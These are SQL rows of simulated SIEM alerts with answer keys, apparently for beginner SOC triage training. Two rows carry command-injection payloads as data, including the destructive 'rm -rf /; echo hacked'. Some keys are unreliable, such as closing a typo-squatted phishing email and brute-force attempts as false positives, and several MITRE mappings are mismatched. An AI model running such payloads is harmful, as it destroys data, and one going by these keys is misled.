(1850, 'Scheduled System Backup Detected as Suspicious Activity', 'low', 'Wazuh', 'A scheduled system backup was detected, initiating large data transfers. This was flagged as suspicious but was confirmed to be part of routine operations.', 'Data Transfer', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.2.50\",\"username\":\"backup_service\",\"hostname\":\"backup01.internal.net\",\"command_line\":\"rsync -avz /data /backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rsync -avz /data /backup\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for routine data backup\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_service\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Service account used for scheduled backups\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"The process was identified as a normal system backup operation.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1851, 'Misconfigured Legacy App Triggering Firewall Alerts', 'medium', 'Azure Sentinel', 'An outdated legacy application is triggering firewall alerts with its unusual traffic patterns. The application is known and regularly monitored by IT.', 'Network Traffic Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.15\",\"dst_ip\":\"198.51.100.10\",\"username\":\"legacy_user\",\"hostname\":\"legacyapp.internal.net\",\"command_line\":\"java -jar legacyapp.jar\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"java -jar legacyapp.jar\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used to run legacy application\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic_anomaly\",\"analysis_notes\":\"The alerts were due to known traffic patterns of a monitored legacy application.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1852, 'Unauthorized Remote Access Detected from External IP', 'high', 'Wazuh', 'A successful remote access was detected from an external IP address to an internal server using valid credentials. This was identified as an unauthorized access attempt.', 'Credential Access', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"185.199.108.153\",\"dst_ip\":\"192.168.1.30\",\"username\":\"compromised_user\",\"hostname\":\"server01.internal.net\",\"command_line\":\"ssh -i key.pem user@192.168.1.30\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username compromised in this incident\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_access\",\"analysis_notes\":\"The access was verified as unauthorized with malicious intent based on OSINT results.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1853, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'An internal vulnerability scan triggered multiple alerts due to its scanning behavior, which resembles malicious activity. The source IP belongs to the IT department.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.255\",\"username\":\"admin_scan\",\"hostname\":\"network-scanner\",\"command_line\":\"nmap -sV -p 1-65535 192.168.1.0/24\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p 1-65535 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Nmap command commonly used for network scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was identified as a routine IT vulnerability scan, not a malicious lateral movement attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1854, 'Authorized Administrative Backup Detected', 'low', 'Azure Sentinel', 'A scheduled backup operation was misidentified as data exfiltration due to high volume of data transfer. Backup is authorized and occurs weekly.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.20\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/backup/ remote@backup-server:/backup/\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for authorized backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup/ remote@backup-server:/backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Rsync command used for data synchronization and backup.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected activity correlates with a scheduled and authorized backup operation.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1855, 'Misconfigured Legacy Application Network Activity', 'medium', 'Wazuh', 'A legacy application generated unusual network traffic patterns, triggering alerts. This activity is linked to a known misconfiguration.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.255\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server\",\"command_line\":\"/usr/bin/legacyapp --connect 192.168.2.255\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/legacyapp --connect 192.168.2.255\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used by legacy application for network communication.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is due to a known misconfiguration in a legacy application, not a lateral movement attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1856, 'Benign System Health Check Triggered Potential Threat Alert', 'low', 'Elastic SIEM', 'A scheduled system health check was flagged as a potential threat due to high-frequency network probes. Activity is part of regular maintenance.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"192.168.3.255\",\"username\":\"sys_health\",\"hostname\":\"health-checker\",\"command_line\":\"/usr/bin/system_check --full-scan\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for system health checks.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/system_check --full-scan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for performing full system health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The activity is part of scheduled system health checks, not malware activity.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1857, 'Potential Command Injection Attempt Detected', 'high', 'Splunk', 'A potential command injection attempt was detected by a web application firewall. Further investigation is required to confirm the threat.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:20:50Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.4.100\",\"username\":\"web_user\",\"hostname\":\"web-server\",\"request_body\":\"cmd.exe /c echo vulnerable\",\"command_line\":\"curl -X POST -d \'cmd.exe /c echo vulnerable\' http://192.168.4.100/execute\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"cmd.exe /c echo vulnerable\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a known malicious IP and a command injection payload confirms this as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1858, 'Routine IT Vulnerability Scan Detected as Brute Force Attack', 'low', 'Splunk', 'A series of login failures were detected from an internal IP address, which is consistent with routine IT vulnerability scanning operations.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:35:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"internal-scanner\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT department for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username commonly used in internal scans.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity matches routine vulnerability scanning patterns and originates from an internal IP.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1859, 'Authorized Administrative Backup Triggered Malware Alert', 'medium', 'Wazuh', 'A backup script execution was flagged as malware due to its behavior resembling ransomware. Upon analysis, it is an authorized backup operation.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:47:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.20\",\"dst_ip\":\"\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"request_body\":\"\",\"command_line\":\"rsync -avz /data /backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rsync -avz /data /backup\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup operation using rsync.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized user for executing backup scripts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command is a legitimate backup operation executed by an authorized user.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1860, 'Misconfigured Legacy Application Causes Suspicious Network Traffic', 'medium', 'Elastic SIEM', 'Network activity from a legacy application was flagged as suspicious due to non-standard communication patterns, which are typical for its outdated protocol.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:12:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.50\",\"username\":\"\",\"hostname\":\"legacy-app-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address receiving data from a legacy application.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This traffic is generated by an outdated protocol from a legacy system, not indicative of an attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1861, 'Benign System Health Check Flagged as Phishing Attempt', 'low', 'Azure Sentinel', 'An email with a URL was flagged as a phishing attempt. After review, it was identified as a system health check email from a trusted vendor.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:58:37Z\",\"event_type\":\"email_received\",\"src_ip\":\"\",\"dst_ip\":\"\",\"username\":\"user1@example.com\",\"hostname\":\"\",\"request_body\":\"\",\"command_line\":\"\",\"email_sender\":\"healthcheck@trustedvendor.com\",\"url\":\"https://status.trustedvendor.com/check\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"healthcheck@trustedvendor.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Email address belongs to a trusted vendor.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://status.trustedvendor.com/check\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is a legitimate system status page.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL were verified to be from a trusted source and are part of regular system checks.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1862, 'Real Malware Detected by Network Monitoring', 'high', 'Wazuh', 'A suspicious process execution was detected on a workstation. OSINT lookup confirmed malicious activity related to a known malware hash.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:18:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-45\",\"request_body\":\"\",\"command_line\":\"malware_process.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"malware_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected in 45/70 antivirus engines as malicious.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is confirmed malicious, indicating a malware infection that needs immediate attention.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1863, 'Suspicious Login Attempt from External IP', 'medium', 'Splunk', 'A login attempt was detected from an external IP address commonly associated with brute force attacks. The attempt involved multiple failed login attempts.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"hostname\":\"server01\",\"failed_attempts\":12}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 15 times for failed login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP showed suspicious behavior but did not result in a successful login, indicating a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1864, 'Authorized Vulnerability Scan Detected as Potential Attack', 'low', 'Wazuh', 'Routine IT vulnerability scanning activity was flagged as a potential network scan attack. The scan originated from an internal IP.', 'Network Scan', 'T1595', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.25\",\"hostname\":\"vulnscanner\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to authorized vulnerability scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"clean\",\"details\":\"Authorized network scan command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scan\",\"analysis_notes\":\"The activity was part of scheduled vulnerability scanning, making the alert a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1865, 'Phishing Email Detected from Known Safe Sender', 'medium', 'Azure Sentinel', 'A potential phishing email was detected but originated from a legitimate sender known to the organization.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"email_sender\":\"it-support@trustedcompany.com\",\"hostname\":\"mailserver01\",\"subject\":\"Critical Security Update\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-support@trustedcompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"clean\",\"details\":\"Email sender verified as a trusted source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was sent by a known and trusted sender, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1866, 'Routine Backup Process Misidentified as Malicious Activity', 'low', 'Elastic SIEM', 'A routine backup process executed on the server was mistakenly flagged as malicious due to its network activity.', 'Data Exfiltration', 'T1070', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.35\",\"username\":\"backupadmin\",\"hostname\":\"backup-server\",\"command_line\":\"/usr/bin/rsync -avz /data backup@192.168.1.35:/backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/rsync -avz /data backup@192.168.1.35:/backup\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Command corresponds to scheduled backup task\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP is internal backup server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The process was identified as a backup operation, confirming the alert as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1867, 'Command Injection Attempt Detected in Web Application', 'high', 'Elastic SIEM', 'A web application detected a command injection attempt using a suspicious payload. The source IP is known for launching such attacks.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.10\",\"hostname\":\"webserver01\",\"request_body\":\"rm -rf /; echo hacked\",\"url\":\"/vulnerable_endpoint\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"rm -rf /; echo hacked\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload and IP analysis confirmed an active command injection attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1868, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'A series of network connection attempts from an internal IP address were detected, resembling vulnerability scanning activity. The source IP belongs to the IT department.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"it_admin\",\"hostname\":\"IT-Scanner\",\"command_line\":\"nmap -sV 192.168.1.200\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with IT department scanner\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV 192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"IT Policy\",\"verdict\":\"clean\",\"details\":\"Routine vulnerability scanning by IT personnel\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This is a scheduled IT security scan, not malicious activity.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1869, 'Unauthorized Login Attempt', 'medium', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP address. The IP is associated with a known VPN service.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"192.168.1.50\",\"username\":\"user123\",\"hostname\":\"AuthServer\",\"failed_attempts\":15}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with VPN service, often used for privacy\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"user123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Active user account with no prior issues\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts are from a known VPN IP, possibly a legitimate user.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1870, 'Suspicious Email with Spoofed Domain', 'medium', 'Proofpoint', 'An email was received from a domain that closely resembles a legitimate partner but is slightly altered.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.7\",\"email_sender\":\"support@micros0ft.com\",\"hostname\":\"MailServer\",\"email_subject\":\"Immediate Action Required\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@micros0ft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles \'microsoft.com\', potential typo-squatting\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.7\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email is suspicious due to typo-squatting but does not contain malicious links or attachments.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1871, 'Administrative Backup Detected', 'low', 'Azure Sentinel', 'A scheduled backup operation was detected on a critical server, initiated by an administrative account.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.15\",\"username\":\"backup_admin\",\"hostname\":\"BackupServer\",\"command_line\":\"backup.exe /start /server\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"IP address is part of internal network, used for backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"backup.exe /start /server\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command executed by authorized personnel\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected process is a legitimate scheduled backup activity.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
